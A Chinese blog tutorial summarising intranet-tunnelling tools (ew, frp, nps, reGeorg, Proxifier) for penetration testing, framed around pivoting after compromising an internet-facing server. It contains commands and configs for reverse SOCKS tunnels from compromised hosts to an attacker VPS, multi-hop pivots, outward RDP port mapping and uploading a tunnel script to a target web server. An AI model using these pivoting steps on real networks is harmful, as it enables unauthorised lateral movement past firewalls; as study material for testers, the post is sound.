<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="内网穿透总结">
    <meta name="description" content="">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>内网穿透总结 | Ex1t</title>
    <link rel="icon" type="image/png" href="/favicon.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">

    <script src="/libs/jquery/jquery.min.js"></script>

<meta name="generator" content="Hexo 5.3.0">
<style>.github-emoji { position: relative; display: inline-block; width: 1.2em; min-height: 1.2em; overflow: hidden; vertical-align: top; color: transparent; }  .github-emoji > span { position: relative; z-index: 10; }  .github-emoji img, .github-emoji .fancybox { margin: 0 !important; padding: 0 !important; border: none !important; outline: none !important; text-decoration: none !important; user-select: none !important; cursor: auto !important; }  .github-emoji img { height: 1.2em !important; width: 1.2em !important; position: absolute !important; left: 50% !important; top: 50% !important; transform: translate(-50%, -50%) !important; user-select: none !important; cursor: auto !important; } .github-emoji-fallback { color: inherit; } .github-emoji-fallback img { opacity: 0 !important; }</style>
<link rel="alternate" href="/atom.xml" title="Ex1t" type="application/atom+xml">
</head>




<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">Ex1t</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/contact" class="waves-effect waves-light">
      
      <i class="fas fa-comments" style="zoom: 0.6;"></i>
      
      <span>留言板</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友情链接</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">Ex1t</div>
        <div class="logo-desc">
            
            Never really desperate, only the lost of the soul.
            
        </div>
    </div>

    

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/contact" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-comments"></i>
			
			留言板
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			友情链接
		</a>
          
        </li>
        
        
    </ul>
</div>


        </div>

        
    </nav>

</header>

    
<script src="/libs/cryptojs/crypto-js.min.js"></script>
<script>
    (function() {
        let pwd = '';
        if (pwd && pwd.length > 0) {
            if (pwd !== CryptoJS.SHA256(prompt('请输入访问本文章的密码')).toString(CryptoJS.enc.Hex)) {
                alert('密码错误，将返回主页！');
                location.href = '/';
            }
        }
    })();
</script>




<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/featureimages/12.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">内网穿透总结</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        padding: 35px 0 15px 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        padding-bottom: 30px;
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/frp/">
                                <span class="chip bg-color">frp</span>
                            </a>
                        
                            <a href="/tags/ew/">
                                <span class="chip bg-color">ew</span>
                            </a>
                        
                            <a href="/tags/regeorg/">
                                <span class="chip bg-color">reGeorg</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2021-08-02
                </div>
                

                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-check fa-fw"></i>更新日期:&nbsp;&nbsp;
                    2021-08-02
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-file-word fa-fw"></i>文章字数:&nbsp;&nbsp;
                    3.4k
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-clock fa-fw"></i>阅读时长:&nbsp;&nbsp;
                    13 分
                </div>
                

                
                    <div id="busuanzi_container_page_pv" class="info-break-policy">
                        <i class="far fa-eye fa-fw"></i>阅读次数:&nbsp;&nbsp;
                        <span id="busuanzi_value_page_pv"></span>
                    </div>
				
            </div>
        </div>
        <hr class="clearfix">

        
        <!-- 是否加载使用自带的 prismjs. -->
        <link rel="stylesheet" href="/libs/prism/prism.css">
        

        
        <!-- 代码块折行 -->
        <style type="text/css">
            code[class*="language-"], pre[class*="language-"] { white-space: pre-wrap !important; }
        </style>
        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <h1 id="一、渗透测试中的内网穿透"><a href="#一、渗透测试中的内网穿透" class="headerlink" title="一、渗透测试中的内网穿透"></a>一、渗透测试中的内网穿透</h1><p>​        当两个不同网络环境的机器想要互相访问的时候，这个时候外网的机器无法单方面的访问内网的机器。所以我们要借助内网穿透工具（配置进内网的流量隧道）进行访问。</p>
<p>​        攻击者在成功入侵某一台对外服务器后也会利用以上代理原理进行内网横向渗透进一步扩大战果，上传代理工具至对外服务器将其改造为跳板机，建立通往内网的通信隧道。</p>
<h1 id="二、内网穿透常用工具"><a href="#二、内网穿透常用工具" class="headerlink" title="二、内网穿透常用工具"></a>二、内网穿透常用工具</h1><pre class="line-numbers language-none"><code class="language-none">ew、frp、nps、reGeorg、Proxifier(socks5客户端)<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>


<h2 id="2-1、ew"><a href="#2-1、ew" class="headerlink" title="2.1、ew"></a>2.1、ew</h2><h3 id="2-1-1、介绍"><a href="#2-1-1、介绍" class="headerlink" title="2.1.1、介绍"></a>2.1.1、介绍</h3><p>​        ew 全称是EarchWorm，是⼀套轻量便携且功能强⼤的⽹络穿透⼯具，基于标准C开发，具有socks5 代理、端⼝转发和端⼝映射三⼤功能，可在复杂⽹络环境下完成⽹络穿透，且⽀持全平台 (Windows/Linux/Mac)。该⼯具能够以“正向”、“反向”、“多级级联”等⽅式打通⼀条⽹络隧道，直达⽹络 深处，⽤蚯蚓独有的⼿段突破⽹络限制，给防⽕墙松⼟。</p>
<h3 id="2-1-2、语法："><a href="#2-1-2、语法：" class="headerlink" title="2.1.2、语法："></a>2.1.2、语法：</h3><p>ew有六种模式，分别是：</p>
<pre class="line-numbers language-none"><code class="language-none">ssocksd：是⽤于普通⽹络环境下的正向连接

rcsocks ：⽤于反向连接。

rssocks：⽤于反向连接。

lcx_slave：⽤于复杂⽹络环境的多级连接。

lcx_listen ：⽤于复杂⽹络环境的多级连接。

lcx_tran：⽤于复杂⽹络环境的多级连接。<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>常⽤参数 </p>
<pre class="line-numbers language-none"><code class="language-none">-l：指定要监听的本地端⼝

-d：指定要反弹到的机器 ip

-e：指定要反弹到的机器端⼝

-f：指定要主动连接的机器 ip

-g：指定要主动连接的机器端⼝

-t：指定超时时⻓,默认为 1000<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>


<h3 id="2-2-3、实际使用"><a href="#2-2-3、实际使用" class="headerlink" title="2.2.3、实际使用"></a>2.2.3、实际使用</h3><p>当我们拿下了一台目标机器，存在内网。那我们就要建立一条隧道，然后通过代理进去</p>
<p>当目标机器有公网ip的话</p>
<pre class="line-numbers language-none"><code class="language-none">VPS：./ew -s rcsocks -l 1080 -e 888  目标机器：./ew -s ssocksd -l 1080<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>我们设置代理为目标ip:888，就能让我们的流量进入对方主机中</p>
<p>大部分为没有公网ip的情况</p>
<p>（1）、端口映射</p>
<p>在VPS上执行，监听本地的999端口</p>
<pre class="line-numbers language-none"><code class="language-none">ew.exe -s ssocksd -l 999<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>再服务器A上执行如下命令，将VPS的888端口和服务器的999端口连接起来</p>
<pre class="line-numbers language-none"><code class="language-none">./ew -s lcx_slave -d 1.1.1.1 -e 888 -f 192.168.10.128 -g 3389<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>远程桌面连接1.1.1.1:888就是在连接服务器A(192.168.10.128)的3389端口</p>
<p>（2）、搭建Socks隧道</p>
<p>1、将VPS的1080端口监听的流量转发到888端口</p>
<p>2、然后让目标机器主动连接我们vps的888端口</p>
<p>3、然后我们设置代理为vps的1080端口，那我们从1080端口走的流量就可以转发到888再到目标机器中</p>
<pre class="line-numbers language-none"><code class="language-none">VPS：./ew -s rcsocks -l 1080 -e 888  目标机器：./ew -s rssocks -d 1.1.1.1 -e 888<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>


<p>（3）、二级代理</p>
<p><img src="https://img.ex1t.xyz//2jdl.png" alt="2jdl"></p>
<p>存在vps、主机A、主机B、服务器C:80（web服务），web网站是主机A映射到公网地址提供web服务</p>
<p>A、B、C只有A通外网，A只能访问B，B能访问A、C，C只有B能访问。</p>
<p>那我们要怎样才能直接访问C的服务呢</p>
<p>在vps上开启监听，将VPS的1088端口的流量转发给888端口</p>
<p><code>./ew -s lcx_listen -l 1080 -e 888</code></p>
<p>在B上执行，监听本地的999端口</p>
<p><code>ew.exe -s ssocksd -l 999</code></p>
<p>再服务器A上执行如下命令，将VPS的888端口和服务器B的999端口连接起来</p>
<p><code>./ew -s lcx_slave -d ip(vps) -e 888 -f ip(主机B) -g 999</code></p>
<p>这样就将A作为中转，将VPS的888端口的流量，发给主机B的999端口。</p>
<p>我们设置代理为vps的1080端口，就可以直接走B的流量。然后访问C的地址就可以了。</p>
<p>（4）、三级代理</p>
<p><img src="https://img.ex1t.xyz//3jdl.png" alt="3jdl"></p>
<p>与二级代理比多了个主机D，挡在B和服务器C之间</p>
<p>只有D能访问服务器C的web服务</p>
<p>首先，在VPS上执行如下命令，将1080端口监听的流量都转发到本地的888端口</p>
<pre class="line-numbers language-none"><code class="language-none">VPS：./ew -s rcsocks -l 1080 -e 888<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>然后在主机A上执行如下命令，作为中转将VPS的888端口和内网主机B的999端口连接起来</p>
<pre class="line-numbers language-none"><code class="language-none">主机A：./ew -s lcx_slave -d ip(VPS) -e 888 -f ip(主机B) -g 999<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>接着在主机B上执行如下命令，将监听的999端口的流量都转发给本地的777端口</p>
<pre class="line-numbers language-none"><code class="language-none">主机B：ew.exe -s lcx_listen -l 999 -e 777<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>最后再主机D上执行如下命令，反弹流量到主机B的777端口</p>
<pre class="line-numbers language-none"><code class="language-none">主机D：./ew -s rssocks -d ip(主机B) -e 777<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>设置代理为vps的1080端口后</p>
<pre class="line-numbers language-none"><code class="language-none">VPS:1080-&gt;888-&gt;B:999-&gt;777-&gt;D<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>就此流量从D走，能够访问服务器C的web服务了</p>
<h2 id="2-2-frp"><a href="#2-2-frp" class="headerlink" title="2.2 frp"></a>2.2 frp</h2><h3 id="2-2-1、介绍"><a href="#2-2-1、介绍" class="headerlink" title="2.2.1、介绍"></a>2.2.1、介绍</h3><p>​        frp 是一个高性能的反向代理应用，支持 tcp, udp, http, https 协议。支持MAC、Windows、Linux。</p>
<p>​        frpc是我们的客户端 ，frps是我们的服务端。 frpc.ini是我们的客户端配置文件 。frps.ini是我们的服务端配置文件。</p>
<h3 id="2-2-2、参数介绍"><a href="#2-2-2、参数介绍" class="headerlink" title="2.2.2、参数介绍"></a>2.2.2、参数介绍</h3><p>简单的配置</p>
<p>frps.int</p>
<pre class="line-numbers language-none"><code class="language-none">[common]  bind_port = 11111      #绑定的端⼝ 

dashboard_port = 22222 #管理端⼝  

dashboard_user = root  #管理的⽤户名  

dashboard_pwd = 123456 #管理⽤户的密码 

token = 1q2w3e         #客户端服务端连接的密码  

heartbeat_timeout = 90 #⼼跳超时时间  

max_pool_count = 5     #最⼤同时连接数<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>frpc.ini</p>
<pre class="line-numbers language-none"><code class="language-none">[common]  server_addr = 1.1.1.1  #服务器地址 

server_port = 11111    #服务器端口 

token = 1q2w3e         #服务器连接密码 

[test]                 #连接名 

type=tcp               #协议 

local_ip = 127.0.0.1   #需要被代理的ip 

local_port = 3389      #需要被代理的端口 

remote_port = 3389     #映射到服务端的端口<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h3 id="2-2-3、实际使用-1"><a href="#2-2-3、实际使用-1" class="headerlink" title="2.2.3、实际使用"></a>2.2.3、实际使用</h3><p>ubuntu启动服务端</p>
<pre class="line-numbers language-none"><code class="language-none">frps -c frps.ini<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>然后访问服务器ip:管理端口，输入管理账号和密码进入页面</p>
<p><img src="https://img.ex1t.xyz//frp1.png" alt="frp1"></p>
<p>可以看到现在是没有任何端口映射的</p>
<p><img src="https://img.ex1t.xyz//frp2.png" alt="frp2"></p>
<p>（1）、端口映射</p>
<p>接下来我打算将我的windows虚拟机的3389端口，映射到我的公网服务器上的10000端口上面‘</p>
<p>那我需要怎么配置呢</p>
<pre class="line-numbers language-none"><code class="language-none">[common]  server_addr = 1.1.1.1  #服务器地址 

server_port = 11111    #服务器端口 

token = 1q2w3e         #服务器连接密码 

[虚拟机win10]                 #连接名 

type=tcp               #要建立tcp连接 

local_ip = 127.0.0.1   #需要被代理的ip， 

local_port = 3389      #需要被代理的端口 

remote_port = 10000     #映射到服务端的端口<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>然后</p>
<pre class="line-numbers language-none"><code class="language-none">frpc.exe -c frpc.ini<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>这样服务器端就出现了</p>
<p><img src="https://img.ex1t.xyz//frp3.png" alt="frp3"></p>
<p>远程连接我服务端的ip:10000，成功提示我输入账号密码</p>
<p> <img src="https://img.ex1t.xyz//frp4.png" alt="frp4"></p>
<p>断开后就提示离线了</p>
<p><img src="https://img.ex1t.xyz//frp5.png" alt="frp5"></p>
<p>在内网的其他机器上，映射我虚拟机的3389端口</p>
<p>就把ip从127.0.0.1改成我的虚拟机ip（ 192.168.107.129）就可以了，端口也改下</p>
<pre class="line-numbers language-none"><code class="language-none">[common]  

server_addr = 1.1.1.1  #服务器地址 

server_port = 11111    #服务器端口 

token = 1q2w3e         #服务器连接密码 

[虚拟机win10-2]                 #连接名 

type=tcp               #协议 

local_ip = 192.168.107.129   #需要被代理的ip，

 local_port = 3389      #需要被代理的端口 

remote_port = 10001     #映射到服务端的端口<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>成功</p>
<p><img src="https://img.ex1t.xyz//frp6.png" alt="frp6"></p>
<p>（2）、建立socks5隧道</p>
<p><code>frpc.exe -c frpc.ini</code></p>
<pre class="line-numbers language-none"><code class="language-none">[common] server_addr = 1.1.1.1#连接的服务器

ip server_port = 11111 #连接的服务器端口 

token=1q2w3e         #连接的服务器密钥 

pool_count = 5  #同时连接数 

protocol = tcp  #协议类型 

health_check_type = tcp 

health_check_interval_s = 100 

[test] 

remote_port = 10000 

plugin = socks5 

use_encryption = true #是否加密  

use_compression = true 

plugin_user= admin     

plugin_passwd= admin<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>然后我们本机设置socks5代理为：1.1.1.1的10000端口即可。</p>
<p>这样我们就能够直接上内网了。</p>
<p>（3）、二级代理</p>
<p><img src="https://img.ex1t.xyz//2jdl.png" alt="2jdl"></p>
<p>还是这种情况，怎么让流量从主机B走呢</p>
<p>通过主机A做跳板，让socks代理建设到内网C主机中</p>
<p>思路是通过将主机A既作服务端，也做客户端</p>
<p>就不设置多的东西了</p>
<p>主机B的frpc.ini设置</p>
<pre class="line-numbers language-none"><code class="language-none">[common] server_addr = 主机A的ip	#连接的服务器ip 

server_port = 11111 #链接的服务器端口 

token=1q2w3e    

[test] 

remote_port = 10000 

plugin = socks5 <span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>主机B建立个socks5隧道到主机A的10000端口上</p>
<p>然后主机A的服务器端frps.ini配置</p>
<pre class="line-numbers language-none"><code class="language-none">[common]  bind_port = 11111      #绑定的端⼝ 

dashboard_port = 22222 #管理端⼝  

dashboard_user = root  #管理的⽤户名  

dashboard_pwd = 123456 #管理⽤户的密码 

token = 1q2w3e         #客户端服务端连接的密码  

heartbeat_timeout = 90 #⼼跳超时时间  

max_pool_count = 5     #最⼤同时连接数<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>主机A的frpc.ini配置</p>
<pre class="line-numbers language-none"><code class="language-none">[common]  server_addr = 1.1.1.1  #服务器地址 

server_port = 11111    #服务器端口 

token = 1q2w3e         #服务器连接密码 

[test]                 #连接名 

type=tcp               #协议 

local_ip = 主机B-ip   #需要被代理的ip

local_port = 10000      #需要被代理的端口 

remote_port = 10001     #映射到服务端的端口<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>A的10000端口就映射到VPS服务端的10001端口上了</p>
<p>我们再设置代理为VPS:10001，走的就是主机B的流量。</p>
<p>（4）、三级代理</p>
<p><img src="https://img.ex1t.xyz//3jdl.png" alt="3jdl"></p>
<p>将主机D上建立一个socks5隧道 到 主机B的10000端口</p>
<p><code>D socks5—&gt;B:10000</code></p>
<p>再将主机B的10000端口映射到 主机A的10001端口</p>
<p><code>B:10000—&gt;A:10001</code></p>
<p>主机A再将10001端口映射到VPS的10002端口即可</p>
<p><code>A:10001—&gt;VPS:10002</code></p>
<h2 id="2-3、nps"><a href="#2-3、nps" class="headerlink" title="2.3、nps"></a>2.3、nps</h2><h3 id="2-3-1、介绍"><a href="#2-3-1、介绍" class="headerlink" title="2.3.1、介绍"></a>2.3.1、介绍</h3><p>​        nps是一款轻量级、高性能、功能强大的内网穿透代理服务器。目前支持tcp、udp流量转发，可支持任何tcp、udp上层协议（访问内网网站、本地支付接口调试、ssh访问、远程桌面，内网dns解析等等……），此外还支持内网http代理、内网socks5代理、p2p等，并带有功能强大的web管理端。</p>
<p>官网文档：<a target="_blank" rel="noopener" href="https://ehang-io.github.io/nps/#/">https://ehang-io.github.io/nps/#/</a></p>
<h3 id="2-3-2、参数介绍"><a href="#2-3-2、参数介绍" class="headerlink" title="2.3.2、参数介绍"></a>2.3.2、参数介绍</h3><p>服务端启动</p>
<p>下载完服务器压缩包后，解压，然后进入解压后的文件夹</p>
<p>执行安装命令</p>
<p>linux</p>
<pre class="line-numbers language-none"><code class="language-none">sudo ./nps install<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>对于windows，管理员身份运行cmd，进入安装目录</p>
<pre class="line-numbers language-none"><code class="language-none">nps.exe install<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>nps默认配置文件使用了80，443，8080，8024端口</p>
<p>80与443端口为域名解析模式默认端口 8080为web管理访问端口 8024为网桥端口，用于客户端与服务器通信</p>
<p>启动</p>
<p>对于linux|darwin </p>
<pre class="line-numbers language-none"><code class="language-none">sudo nps start<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>对于windows，管理员身份运行cmd，进入程序目录 </p>
<pre class="line-numbers language-none"><code class="language-none">nps.exe start<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>windows配置文件位于 C:\Program Files\nps</p>
<p>linux和darwin位于/etc/nps</p>
<p>主要是配置文件中要改一改，尤其是账号密码</p>
<p>/conf/nps.conf</p>
<p> <img src="https://img.ex1t.xyz//nps1.png" alt="nps1"></p>
<h3 id="2-3-3、实际使用"><a href="#2-3-3、实际使用" class="headerlink" title="2.3.3、实际使用"></a>2.3.3、实际使用</h3><p>192.168.31.146启动服务端</p>
<pre class="line-numbers language-none"><code class="language-none">sudo nps start<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>访问：192.168.31.146:8080</p>
<p>默认密码：admin/123</p>
<p>进入主界面</p>
<p><img src="https://img.ex1t.xyz//nps2.png" alt="nps2"></p>
<p>添加客户端：192.168.31.163</p>
<p><img src="https://img.ex1t.xyz//nps3.png" alt="nps3"></p>
<p>通过下面的命令启动客户端，记得使用管理员cmd</p>
<pre class="line-numbers language-none"><code class="language-none">npc.exe -server=192.168.31.146:8024 -vkey=ss5hr5jqny68k18s -type=tcp<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>成功上线</p>
<p><img src="https://img.ex1t.xyz//nps4.png" alt="nps4"></p>
<p>（1）、端口映射</p>
<p>点击右方的隧道</p>
<p><img src="https://img.ex1t.xyz//nps5.png" alt="nps5"></p>
<p>将我本机的3389端口映射到服务器的8888端口，那么远程连接服务器的8888端口，就是本机的3389</p>
<p><img src="https://img.ex1t.xyz//nps6.png" alt="nps6"></p>
<p>添加成功</p>
<p><img src="https://img.ex1t.xyz//nps7.png" alt="nps7"></p>
<p>然后连接：服务器:8888即可成功。</p>
<p>之前是成功了，但是没截图。后面本机的远程桌面出了点问题，就不截图了。</p>
<p>在实际运用中，服务端部署在公网VPS上即可。</p>
<p>（2）、socks代理</p>
<p><img src="https://img.ex1t.xyz//nps8.png" alt="nps8"></p>
<p>设置客户端ID和端口即可</p>
<p><img src="https://img.ex1t.xyz//nps9.png" alt="nps9"></p>
<p>然后设置代理为服务器:989即可。</p>
<p>（3）、二级代理</p>
<p><img src="https://img.ex1t.xyz//2jdl.png" alt="2jdl"></p>
<p>首先主机A作为服务端，主机B作为客户端</p>
<p>建立一个socks隧道到主机A的989端口。</p>
<p>VPS作为服务端，主机A作为客户端</p>
<p>映射A的989端口到VPS的10000端口</p>
<p>设置代理为VPS:10000，就能访问到C的web服务了</p>
<p>（4）、三级代理</p>
<p><img src="https://img.ex1t.xyz//3jdl.png" alt="3jdl"></p>
<p>B作为服务端口，D作为客户端</p>
<p>D建立一个Socks隧道到B的989端口</p>
<p>A作为服务端，B作为客户端</p>
<p>B将989端口映射到A的999端口</p>
<p>VPS作为服务端口，A作为客户端</p>
<p>A将999端口映射到B的10000端口</p>
<p>然后设置代理为VPS的10000端口，即可访问到C的web服务了</p>
<h2 id="2-4、regeorg"><a href="#2-4、regeorg" class="headerlink" title="2.4、regeorg"></a>2.4、regeorg</h2><h3 id="2-4-1、介绍"><a href="#2-4-1、介绍" class="headerlink" title="2.4.1、介绍"></a>2.4.1、介绍</h3><p>​        当目标只有一个端口能访问内网，其他端口不出网的情况下使用。通过上传脚本文件到web服务器，通过python2设置代理为该脚本地址来进行内网探测。</p>
<h3 id="2-4-2、参数介绍"><a href="#2-4-2、参数介绍" class="headerlink" title="2.4.2、参数介绍"></a>2.4.2、参数介绍</h3><pre class="line-numbers language-none"><code class="language-none">-p  代理监听端口

-u  脚本地址<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<h3 id="2-4-3、实际使用"><a href="#2-4-3、实际使用" class="headerlink" title="2.4.3、实际使用"></a>2.4.3、实际使用</h3><p>首先，上传隧道脚本文件(aspx|ashx|jsp|php) 到web服务器</p>
<p>本地运行</p>
<pre class="line-numbers language-none"><code class="language-none">python2 reGeorgSocksProxy.py -p 8888 -u http://目标:8080/tunnel/tunnel.jsp<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>然后我们设置socks代理为127.0.0.1:8888就可以进入内网了</p>
<h2 id="2-5、Proxifier"><a href="#2-5、Proxifier" class="headerlink" title="2.5、Proxifier"></a>2.5、Proxifier</h2><h3 id="2-5-1、介绍"><a href="#2-5-1、介绍" class="headerlink" title="2.5.1、介绍"></a>2.5.1、介绍</h3><p>​        Proxifier是一款功能非常强大的socks5客户端，可以让不支持代理服务器工作的程序变的可行。支持各种操作系统和各代理协议，它的运行模式可以指定端口，指定程序的特点。在内网穿透过程中常用来进行socks代理。</p>
<h3 id="2-5-2、实际使用"><a href="#2-5-2、实际使用" class="headerlink" title="2.5.2、实际使用"></a>2.5.2、实际使用</h3><p>添加代理服务器</p>
<p> <img src="https://img.ex1t.xyz//pro1.png" alt="pro1"></p>
<p>设置好ip、端口、[账号、密码]</p>
